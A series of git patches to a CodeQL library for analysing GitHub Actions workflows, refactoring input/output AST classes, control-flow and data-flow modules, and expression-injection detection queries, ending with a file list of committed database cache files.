.github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | argumentNodes | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | usesIds | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | source | | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | step | nodeLocations +| .github/workflows/test.yml:1:1:40:53 | enter on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | +| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | | .github/workflows/test.yml:1:1:40:53 | on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 168987284c31..7524e31f050b 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -9,49 +9,39 @@ query predicate files(File f) { any() } query predicate yamlNodes(YamlNode n) { any() } -query predicate jobNodes(JobStmt s) { any() } +query predicate jobNodes(Job s) { any() } -query predicate stepNodes(StepStmt s) { any() } +query predicate stepNodes(Step s) { any() } -query predicate allUsesNodes(UsesExpr s) { any() } +query predicate allUsesNodes(Uses s) { any() } -query predicate stepUsesNodes(StepUsesExpr s) { any() } +query predicate stepUsesNodes(StepUses s) { any() } -query predicate jobUsesNodes(JobUsesExpr s) { any() } +query predicate jobUsesNodes(JobUses s) { any() } -query predicate usesSteps(UsesExpr call, string argname, Expression arg) { +query predicate usesSteps(Uses call, string argname, Expression arg) { call.getArgumentExpr(argname) = arg } -query predicate runSteps1(RunExpr run, string body) { run.getScript() = body } +query predicate runSteps(Run run, string body) { run.getScript() = body } -query predicate runSteps2(RunExpr run, Expression bodyExpr) { run.getScriptExpr() = bodyExpr } - -query predicate runStepChildren(RunExpr run, AstNode child) { child.getParentNode() = run } - -query predicate varAccesses(ExprAccessExpr ea, string expr) { expr = ea.getExpression() } - -query predicate orphanVarAccesses(ExprAccessExpr va, string var) { - var = va.getExpression() and - not exists(AstNode n | n = va.getParentNode()) -} - -query predicate nonOrphanVarAccesses(ExprAccessExpr va, string var, AstNode parent) { - var = va.getExpression() and - parent = va.getParentNode() -} +query predicate runStepChildren(Run run, AstNode child) { child.getParentNode() = run } query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } -query predicate cfgNodes(Cfg::Node n) { any() } +query predicate cfgNodes(Cfg::Node n) { + n.getLocation().getFile().getBaseName() = "argus_case_study.yml" +} //any() } -query predicate dfNodes(DataFlow::Node e) { any() } +query predicate dfNodes(DataFlow::Node e) { + e.getLocation().getFile().getBaseName() = "argus_case_study.yml" +} //any() } -query predicate exprNodes(DataFlow::ExprNode e) { any() } +query predicate exprNodes(DataFlow::Node e) { any() } query predicate argumentNodes(DataFlow::ArgumentNode e) { any() } -query predicate usesIds(StepUsesExpr s, string a) { s.getId() = a } +query predicate usesIds(StepUses s, string a) { s.getId() = a } query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l } @@ -67,4 +57,4 @@ query predicate summaries(string action, string version, string input, string ou query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } -query predicate needs(DataFlow::ExprNode e) { e.asExpr() instanceof NeedsCtxAccessExpr } +query predicate needs(DataFlow::Node e) { e.asExpr() instanceof NeedsExpression } From bcf308125912d17d3ab7460191948be90b292f44 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 1 Mar 2024 11:17:23 +0100 Subject: [PATCH 082/707] Refactor Input/Outpts --- ql/lib/codeql/actions/Ast.qll | 129 ++++++++++-------- .../actions/controlflow/internal/Cfg.qll | 38 ++---- .../codeql/actions/dataflow/FlowSources.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 11 +- .../dataflow/internal/DataFlowPublic.qll | 11 +- .../Security/CWE-020/CompositeActionsSinks.ql | 2 +- .../CWE-020/CompositeActionsSources.ql | 2 +- .../CWE-020/CompositeActionsSummaries.ql | 4 +- .../CWE-020/ReusableWorkflowsSinks.ql | 2 +- .../CWE-020/ReusableWorkflowsSources.ql | 2 +- .../CWE-020/ReusableWorkflowsSummaries.ql | 4 +- ql/test/library-tests/test.ql | 8 +- 12 files changed, 108 insertions(+), 107 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 881daf133367..cb561fdf8d1c 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -2,7 +2,7 @@ private import codeql.actions.ast.internal.Actions private import codeql.Locations /** - * Base class for thejAST tree. Based on YamlNode from the Yaml library. + * Base class for the AST tree. Based on YamlNode from the Yaml library. */ class AstNode instanceof YamlNode { AstNode getParentNode() { result = super.getParentNode() } @@ -23,7 +23,7 @@ class AstNode instanceof YamlNode { /** * Gets a environment variable expression by name in the scope of the current node. */ - EnvExpr getEnvExpr(string name) { + Expression getEnvExpr(string name) { exists(Actions::Env env | env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) | @@ -42,9 +42,18 @@ class AstNode instanceof YamlNode { class CompositeAction extends AstNode instanceof Actions::CompositeAction { Runs getRuns() { result = super.getRuns() } - Inputs getInputs() { result = this.(YamlMapping).lookup("inputs") } - Outputs getOutputs() { result = this.(YamlMapping).lookup("outputs") } + + Expression getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + + Expression getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + + Input getAnInput() { this.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) } + + Input getInput(string name) { + this.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) and + result.(YamlString).getValue() = name + } } class Runs extends AstNode instanceof Actions::Runs { @@ -81,34 +90,43 @@ class ReusableWorkflow extends Workflow { ReusableWorkflow() { this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } - Inputs getInputs() { result = workflow_call.(YamlMapping).lookup("inputs") } - Outputs getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } -} -class Inputs extends AstNode instanceof YamlMapping { - YamlMapping parent; + Expression getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } - Inputs() { parent.lookup("inputs") = this } + Expression getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } - /** - * Gets a specific input expression (YamlMapping) by name. - */ - InputExpr getInputExpr(string name) { - result.(YamlString).getValue() = name and - this.(YamlMapping).maps(result, _) + Input getAnInput() { workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) } + + Input getInput(string name) { + workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) and + result.(YamlString).getValue() = name } } +class Input extends AstNode { + YamlMapping parent; + + Input() { parent.lookup("inputs").(YamlMapping).maps(this, _) } +} + class Outputs extends AstNode instanceof YamlMapping { YamlMapping parent; Outputs() { parent.lookup("outputs") = this } /** - * Gets a specific output expression (YamlMapping) by name. + * Gets an output expression. + */ + Expression getAnOutputExpr() { + this.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = result or + this.(YamlMapping).lookup(_) = result + } + + /** + * Gets a specific output expression by name. */ - OutputExpr getOutputExpr(string name) { + Expression getOutputExpr(string name) { this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result or this.(YamlMapping).lookup(name) = result } @@ -130,7 +148,7 @@ class Strategy extends AstNode instanceof YamlMapping { /** * Gets a specific matric expression (YamlMapping) by name. */ - MatrixVariableExpr getMatrixVariableExpr(string name) { + Expression getMatrixVariableExpr(string name) { this.(YamlMapping).lookup("matrix").(YamlMapping).lookup(name) = result } @@ -318,41 +336,40 @@ class Run extends Step { string getScript() { result = scriptExpr.getValue() } } -/** - * An AST node associated with a Reusable Workflow input. - */ -class InputExpr extends AstNode { - InputExpr() { exists(Inputs inputs | inputs.(YamlMapping).maps(this, _)) } -} - -/** - * An AST node holding an Env var value. - */ -class EnvExpr extends AstNode { - EnvExpr() { exists(Actions::Env env | env.(YamlMapping).lookup(_) = this) } -} - -/** - * An AST node holding a job or workflow output var. - */ -class OutputExpr extends AstNode { - OutputExpr() { - exists(Outputs outputs | - outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or - outputs.(YamlMapping).lookup(_) = this - ) - } -} - -/** - * An AST node holding a matrix var. - */ -class MatrixVariableExpr extends AstNode { - MatrixVariableExpr() { - exists(Strategy outputs | outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this) - } -} - +// /** +// * An AST node associated with a Reusable Workflow input. +// */ +// class InputExpr extends AstNode { +// InputExpr() { exists(Inputs inputs | inputs.(YamlMapping).maps(this, _)) } +// } +// +// /** +// * An AST node holding an Env var value. +// */ +// class EnvExpr extends AstNode { +// EnvExpr() { exists(Actions::Env env | env.(YamlMapping).lookup(_) = this) } +// } +// +// /** +// * An AST node holding a job or workflow output var. +// */ +// class OutputExpr extends AstNode { +// OutputExpr() { +// exists(Outputs outputs | +// outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or +// outputs.(YamlMapping).lookup(_) = this +// ) +// } +// } +// +// /** +// * An AST node holding a matrix var. +// */ +// class MatrixVariableExpr extends AstNode { +// MatrixVariableExpr() { +// exists(Strategy outputs | outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this) +// } +// } /** * Evaluation of a workflow expression ${{}}. */ @@ -508,9 +525,9 @@ class InputsExpression extends ContextExpression { override AstNode getTarget() { result.getLocation().getFile() = this.getLocation().getFile() and ( - exists(ReusableWorkflow w | w.getInputs().getInputExpr(fieldName) = result) + exists(ReusableWorkflow w | w.getInput(fieldName) = result) or - exists(CompositeAction a | a.getInputs().getInputExpr(fieldName) = result) + exists(CompositeAction a | a.getInput(fieldName) = result) ) } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 2bc867234931..661544dfed25 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -148,8 +148,8 @@ private class CompositeActionTree extends StandardPreOrderTree instanceof Compos result = rank[i](AstNode child, Location l | ( - child = this.(CompositeAction).getInputs() or - child = this.(CompositeAction).getOutputs() or + child = this.(CompositeAction).getAnInput() or + child = this.(CompositeAction).getAnOutputExpr() or child = this.(CompositeAction).getRuns() ) and l = child.getLocation() @@ -172,10 +172,10 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { result = rank[i](AstNode child, Location l | ( - child = this.(ReusableWorkflow).getInputs() or - child = this.(ReusableWorkflow).getOutputs() or - child = this.(ReusableWorkflow).getStrategy() or - child = this.(ReusableWorkflow).getAJob() + child = this.(ReusableWorkflow).getAJob() or + child = this.(ReusableWorkflow).getAnInput() or + child = this.(ReusableWorkflow).getAnOutputExpr() or + child = this.(ReusableWorkflow).getStrategy() ) and l = child.getLocation() | @@ -199,19 +199,6 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { } } -private class InputsTree extends StandardPreOrderTree instanceof Inputs { - override ControlFlowTree getChildNode(int i) { - result = - rank[i](AstNode child, Location l | - child = super.getInputExpr(_) and l = child.getLocation() - | - child - order by - l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - ) - } -} - private class OutputsTree extends StandardPreOrderTree instanceof Outputs { override ControlFlowTree getChildNode(int i) { result = @@ -287,14 +274,13 @@ private class RunTree extends StandardPreOrderTree instanceof Run { private class UsesLeaf extends LeafTree instanceof Uses { } -private class InputExprTree extends LeafTree instanceof InputExpr { } - -private class OutputExprTree extends LeafTree instanceof OutputExpr { } - -private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } - -private class EnvExprTree extends LeafTree instanceof EnvExpr { } +private class InputTree extends LeafTree instanceof Input { } +// private class OutputExprTree extends LeafTree instanceof OutputExpr { } +// +// private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } +// +// private class EnvExprTree extends LeafTree instanceof EnvExpr { } private class ExprAccessTree extends LeafTree instanceof ContextExpression { } private class AstNodeLeaf extends LeafTree instanceof Expression { } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index c30c963afdb0..32d37efdaaea 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -160,7 +160,7 @@ private class ExternallyDefinedSource extends RemoteFlowSource { private class CompositeActionInputSource extends RemoteFlowSource { CompositeAction c; - CompositeActionInputSource() { c.getInputs().getInputExpr(_) = this.asExpr() } + CompositeActionInputSource() { c.getAnInput() = this.asExpr() } override string getSourceType() { result = "Composite action input" } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 62975959b399..d99db775d613 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -54,8 +54,13 @@ DataFlowType getNodeType(Node node) { any() } predicate nodeIsHidden(Node node) { none() } class DataFlowExpr extends Cfg::Node { - DataFlowExpr() { any() } - //DataFlowExpr() { this.getAstNode() instanceof Expression } + DataFlowExpr() { + this.getAstNode() instanceof Expression or + this.getAstNode() instanceof Uses or + this.getAstNode() instanceof Run or + this.getAstNode() instanceof Outputs or + this.getAstNode() instanceof Input + } } /** @@ -150,7 +155,7 @@ ContentApprox getContentApprox(Content c) { result = c } * Made a string to match the ArgumentPosition type. */ class ParameterPosition extends string { - ParameterPosition() { exists(any(ReusableWorkflow w).getInputs().getInputExpr(this)) } + ParameterPosition() { exists(any(ReusableWorkflow w).getInput(this)) } } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index a8434cdb6033..dbae273151b0 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -48,22 +48,19 @@ class ExprNode extends Node, TExprNode { * Reusable workflow input nodes */ class ParameterNode extends ExprNode { - private InputExpr input; + private Input input; - ParameterNode() { - this.asExpr() = input and - input = any(Inputs s).getInputExpr(_) - } + ParameterNode() { this.asExpr() = input } predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - input = c.(ReusableWorkflow).getInputs().getInputExpr(pos) + input = c.(ReusableWorkflow).getInput(pos) } override string toString() { result = "input " + input.toString() } override Location getLocation() { result = input.getLocation() } - InputExpr getInputExpr() { result = input } + Input getInput() { result = input } } /** diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 5bff6abc7bb9..4b78f275382a 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -25,7 +25,7 @@ private class ExpressionInjectionSink extends DataFlow::Node { private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(CompositeAction c | c.getInputs().getInputExpr(_) = source.asExpr()) + exists(CompositeAction c | c.getAnInput() = source.asExpr()) } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 12703a6cff2d..0edeb0a7ec80 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getOutputs().getOutputExpr(_) = sink.asExpr()) + exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql index e5933a73b36c..59a05f64b6c9 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql @@ -18,11 +18,11 @@ import codeql.actions.dataflow.ExternalFlow private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(CompositeAction c | c.getInputs().getInputExpr(_) = source.asExpr()) + exists(CompositeAction c | c.getAnInput() = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getOutputs().getOutputExpr(_) = sink.asExpr()) + exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 1e1f942b200d..28ff074fd966 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -25,7 +25,7 @@ private class ExpressionInjectionSink extends DataFlow::Node { private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(ReusableWorkflow w | w.getInputs().getInputExpr(_) = source.asExpr()) + exists(ReusableWorkflow w | w.getAnInput() = source.asExpr()) } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql index 7bcea3d45b02..6e88f36feced 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql @@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getOutputs().getOutputExpr(_) = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql index 5ac0c2999295..4f710a16e8f6 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql @@ -18,11 +18,11 @@ import codeql.actions.dataflow.ExternalFlow private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(ReusableWorkflow w | w.getInputs().getInputExpr(_) = source.asExpr()) + exists(ReusableWorkflow w | w.getAnInput() = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getOutputs().getOutputExpr(_) = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) } } diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 7524e31f050b..abdd087590a3 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -29,13 +29,9 @@ query predicate runStepChildren(Run run, AstNode child) { child.getParentNode() query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } -query predicate cfgNodes(Cfg::Node n) { - n.getLocation().getFile().getBaseName() = "argus_case_study.yml" -} //any() } +query predicate cfgNodes(Cfg::Node n) { n.getLocation().getFile().getBaseName() = "test.yml" } //any() } -query predicate dfNodes(DataFlow::Node e) { - e.getLocation().getFile().getBaseName() = "argus_case_study.yml" -} //any() } +query predicate dfNodes(DataFlow::Node e) { e.getLocation().getFile().getBaseName() = "test.yml" } //any() } query predicate exprNodes(DataFlow::Node e) { any() } From 1c2f19f4e168b846508f76937118f6c94a245eca Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 1 Mar 2024 16:06:06 +0100 Subject: [PATCH 083/707] Merge Actions.qll and Ast.qll --- clean.sh | 2 + db/baseline-info.json | 1 + db/codeql-database.yml | 10 + db/db-yaml/default/cache/.lock | 0 .../cache/cached-strings/pools/0/buckets/info | Bin 0 -> 40 bytes .../pools/0/buckets/page-000000 | Bin 0 -> 8192 bytes .../cache/cached-strings/pools/0/ids1/info | Bin 0 -> 40 bytes .../cached-strings/pools/0/ids1/page-000000 | Bin 0 -> 8192 bytes .../cached-strings/pools/0/indices1/info | Bin 0 -> 40 bytes .../pools/0/indices1/page-000000 | Bin 0 -> 8192 bytes .../default/cache/cached-strings/pools/0/info | Bin 0 -> 41 bytes .../cached-strings/pools/0/metadata/info | Bin 0 -> 40 bytes .../pools/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../pools/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes .../cache/cached-strings/pools/poolInfo | Bin 0 -> 28 bytes .../cache/cached-strings/tuple-pool/header | Bin 0 -> 4 bytes ...9--Implementation---Cached--TNode-56603d11 | Bin 0 -> 16 bytes ...mplementation---Cached--TNode-56603d11#0#e | Bin 0 -> 216 bytes ...plementation---Cached--TNode-56603d11#1#eb | Bin 0 -> 320 bytes ...mplementation---Cached--TNode-56603d11#2#e | Bin 0 -> 216 bytes ...lementation---Cached--TNode-56603d11#3#eet | Bin 0 -> 6312 bytes ...-Implementation---Cached--TSplits-cdffdde7 | Bin 0 -> 16 bytes ...plementation---Cached--TSplits-cdffdde7#0# | Bin 0 -> 12 bytes ...ples#Cfg#f90a6699--Completion--TCompletion | Bin 0 -> 16 bytes ...s#Cfg#f90a6699--Completion--TCompletion#0# | Bin 0 -> 12 bytes ...s#Cfg#f90a6699--Completion--TSuccessorType | Bin 0 -> 16 bytes ...fg#f90a6699--Completion--TSuccessorType#0# | Bin 0 -> 12 bytes ...g#f90a6699--Completion--TSuccessorType#1#b | Bin 0 -> 24 bytes ...fg#f90a6699--Completion--TSuccessorType#2# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-0defa4a0 | Bin 0 -> 16 bytes ...king#f6f2598d--TaintFlow-0defa4a0#0#tttttt | Bin 0 -> 3200 bytes ...Tracking#f6f2598d--TaintFlow-0defa4a0#1#tt | Bin 0 -> 896 bytes ...TaintTracking#f6f2598d--TaintFlow-5b92615f | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-5b92615f#0# | Bin 0 -> 12 bytes ...racking#f6f2598d--TaintFlow-5b92615f#1#ttt | Bin 0 -> 152 bytes ...TaintTracking#f6f2598d--TaintFlow-6e089ab6 | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-6e089ab6#0# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-a2a08e4a | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-a2a08e4a#0# | Bin 0 -> 12 bytes ...Tracking#f6f2598d--TaintFlow-a2a08e4a#1#tt | Bin 0 -> 116 bytes ...TaintTracking#f6f2598d--TaintFlow-b0571e78 | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-b0571e78#0# | Bin 0 -> 12 bytes ...tTracking#f6f2598d--TaintFlow-b0571e78#1#t | Bin 0 -> 88 bytes ...TaintTracking#f6f2598d--TaintFlow-b18fe878 | Bin 0 -> 16 bytes ...tTracking#f6f2598d--TaintFlow-b18fe878#0#t | Bin 0 -> 2216 bytes ...taFlow---Cached--TAccessPathFront-12309985 | Bin 0 -> 16 bytes ...low---Cached--TAccessPathFront-12309985#0# | Bin 0 -> 12 bytes ...ow---Cached--TAccessPathFront-12309985#1#t | Bin 0 -> 104 bytes ...Flow---Cached--TAccessPathFrontOp-ea156098 | Bin 0 -> 16 bytes ...w---Cached--TAccessPathFrontOp-ea156098#0# | Bin 0 -> 12 bytes ...---Cached--TAccessPathFrontOp-ea156098#1#t | Bin 0 -> 112 bytes ...Flow---Cached--TApproxAccessPathF-0bf03857 | Bin 0 -> 16 bytes ...w---Cached--TApproxAccessPathF-0bf03857#0# | Bin 0 -> 12 bytes ...---Cached--TApproxAccessPathF-0bf03857#1#t | Bin 0 -> 112 bytes ...Flow---Cached--TApproxAccessPathF-baba9c49 | Bin 0 -> 16 bytes ...w---Cached--TApproxAccessPathF-baba9c49#0# | Bin 0 -> 12 bytes ...---Cached--TApproxAccessPathF-baba9c49#1#t | Bin 0 -> 104 bytes ...DataFlow---Cached--TBooleanOption-dec0af22 | Bin 0 -> 16 bytes ...aFlow---Cached--TBooleanOption-dec0af22#0# | Bin 0 -> 12 bytes ...Flow---Cached--TBooleanOption-dec0af22#1#b | Bin 0 -> 24 bytes ...nsDataFlow---Cached--TCallContext-54d858e5 | Bin 0 -> 16 bytes ...ataFlow---Cached--TCallContext-54d858e5#0# | Bin 0 -> 12 bytes ...ataFlow---Cached--TCallContext-54d858e5#2# | Bin 0 -> 12 bytes ...Flow---Cached--TDataFlowCallOptio-c18bdb95 | Bin 0 -> 16 bytes ...w---Cached--TDataFlowCallOptio-c18bdb95#0# | Bin 0 -> 12 bytes ...---Cached--TDataFlowCallOptio-c18bdb95#1#t | Bin 0 -> 280 bytes ...Flow---Cached--TLocalFlowCallCont-17f4a8f6 | Bin 0 -> 16 bytes ...w---Cached--TLocalFlowCallCont-17f4a8f6#0# | Bin 0 -> 12 bytes ...taFlow---Cached--TParamNodeOption-178d6b8b | Bin 0 -> 16 bytes ...low---Cached--TParamNodeOption-178d6b8b#0# | Bin 0 -> 12 bytes ...ionsDataFlow---Cached--TReturnCtx-f40235df | Bin 0 -> 16 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#0# | Bin 0 -> 12 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#1# | Bin 0 -> 12 bytes ...DataFlow---Cached--TReturnKindExt-9770a119 | Bin 0 -> 16 bytes ...Flow---Cached--TReturnKindExt-9770a119#0#t | Bin 0 -> 16 bytes .../tuples#DataFlowPrivate#6a54d7ad--TContent | Bin 0 -> 16 bytes ...les#DataFlowPrivate#6a54d7ad--TContent#0#s | Bin 0 -> 104 bytes ...es#DataFlowPrivate#6a54d7ad--TDataFlowType | Bin 0 -> 16 bytes ...DataFlowPrivate#6a54d7ad--TDataFlowType#0# | Bin 0 -> 12 bytes .../tuples#DataFlowPrivate#6a54d7ad--TNode | Bin 0 -> 16 bytes ...tuples#DataFlowPrivate#6a54d7ad--TNode#0#t | Bin 0 -> 2216 bytes ...ples#DataFlowPrivate#6a54d7ad--TReturnKind | Bin 0 -> 16 bytes ...s#DataFlowPrivate#6a54d7ad--TReturnKind#0# | Bin 0 -> 12 bytes ...#6a54d7ad--DataFlowType---TOption-4fb642c9 | Bin 0 -> 16 bytes ...54d7ad--DataFlowType---TOption-4fb642c9#0# | Bin 0 -> 12 bytes ...4d7ad--DataFlowType---TOption-4fb642c9#1#t | Bin 0 -> 16 bytes ...ion-Unit#54592529--Unit---TOption-51176e26 | Bin 0 -> 16 bytes ...-Unit#54592529--Unit---TOption-51176e26#0# | Bin 0 -> 12 bytes ...Unit#54592529--Unit---TOption-51176e26#1#t | Bin 0 -> 16 bytes .../tuple-pool/tuples#Unit#54592529--TUnit | Bin 0 -> 16 bytes .../tuple-pool/tuples#Unit#54592529--TUnit#0# | Bin 0 -> 12 bytes db/db-yaml/default/cache/pages/01.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/01.pack.d | Bin 0 -> 844 bytes db/db-yaml/default/cache/pages/02.pack | Bin 0 -> 79 bytes db/db-yaml/default/cache/pages/08.pack | Bin 0 -> 87 bytes db/db-yaml/default/cache/pages/09.pack | Bin 0 -> 167 bytes db/db-yaml/default/cache/pages/09.pack.d | Bin 0 -> 2341 bytes db/db-yaml/default/cache/pages/0b.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/0b.pack.d | Bin 0 -> 292 bytes db/db-yaml/default/cache/pages/0d.pack | Bin 0 -> 84 bytes db/db-yaml/default/cache/pages/17.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/17.pack.d | Bin 0 -> 5326 bytes db/db-yaml/default/cache/pages/20.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/20.pack.d | Bin 0 -> 574 bytes db/db-yaml/default/cache/pages/24.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/24.pack.d | Bin 0 -> 6318 bytes db/db-yaml/default/cache/pages/26.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/26.pack.d | Bin 0 -> 294 bytes db/db-yaml/default/cache/pages/27.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/27.pack.d | Bin 0 -> 1493 bytes db/db-yaml/default/cache/pages/29.pack | Bin 0 -> 84 bytes db/db-yaml/default/cache/pages/2b.pack | Bin 0 -> 84 bytes db/db-yaml/default/cache/pages/2d.pack | Bin 0 -> 91 bytes db/db-yaml/default/cache/pages/33.pack | Bin 0 -> 65 bytes 